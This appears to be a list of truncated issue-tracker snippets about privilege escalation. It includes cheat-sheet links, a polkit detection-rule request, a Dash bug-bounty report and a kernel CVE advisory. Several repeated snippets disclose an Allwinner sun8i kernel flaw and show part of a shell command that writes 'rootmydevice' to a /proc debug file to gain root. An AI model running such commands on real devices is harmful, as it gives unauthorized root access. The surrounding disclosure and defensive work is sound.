-
Link to the tool: https://... (minimum 1 required):
[link]https://github.com/nickvourd/Windows-Local-Privilege-Escalation-Cookbook[/link]
List of tags separated by comma: tag1,tag2,tag3... (requir…
-
Please check and fix:
```
tk@bananapim3:~$ id
uid=1000(tk) gid=1000(tk) groups=1000(tk),20(dialout),27(sudo),29(audio),44(video),46(plugdev),108(netdev)
tk@bananapim3:~$ echo "rootmydevice" > /proc/s…
-
Check and fix please:
```
tk@bananapim3:~$ id
uid=1000(tk) gid=1000(tk) groups=1000(tk),20(dialout),27(sudo),29(audio),44(video),46(plugdev),108(netdev)
tk@bananapim3:~$ echo "rootmydevice" > /proc/s…
-
While I know that this repo isn't maintained since over half a year more like a reference. Seems like Allwinner's sun8i kernel sources allow everyone to become root easily:
```
tk@bananapim3:~$ id
ui…
-
**Motivation**
To Add an event on default rule "Polkit Local Privilege Escalation Vulnerability (CVE-2021-4034)"
**Feature**
**Alternatives**
**Additional context**
-
Are you affected too?
```
tk@bananapim3:~$ id
uid=1000(tk) gid=1000(tk) groups=1000(tk),20(dialout),27(sudo),29(audio),44(video),46(plugdev),108(netdev)
tk@bananapim3:~$ echo "rootmydevice" > /proc/s…
-
Please check and fix
```
tk@bananapim3:~$ id
uid=1000(tk) gid=1000(tk) groups=1000(tk),20(dialout),27(sudo),29(audio),44(video),46(plugdev),108(netdev)
tk@bananapim3:~$ echo "rootmydevice" > /proc/su…
-
The following issue was discovered and reported via the Dash Bug Bounty program:
https://www.dash.org/forum/threads/dash-bug-bounty-program.16100/
It is possible for an attacker that has limited a…
-
### OSCP-CheatSheet
https://notchxor.github.io/oscp-notes/2-web/LFI-RFI/
https://github.com/WDavid404/OSCP-CheatSheet
https://github.com/saisathvik1/OSCP-Cheatsheet
### Windows privilege escal…
-
## CVE-2022-27666 - High Severity Vulnerability
Vulnerable Libraries - linuxlinux-4.19.87, linuxlinux-4.19.87
Vulnerability Details
A heap buffer overflow flaw was found in IPsec ESP tra…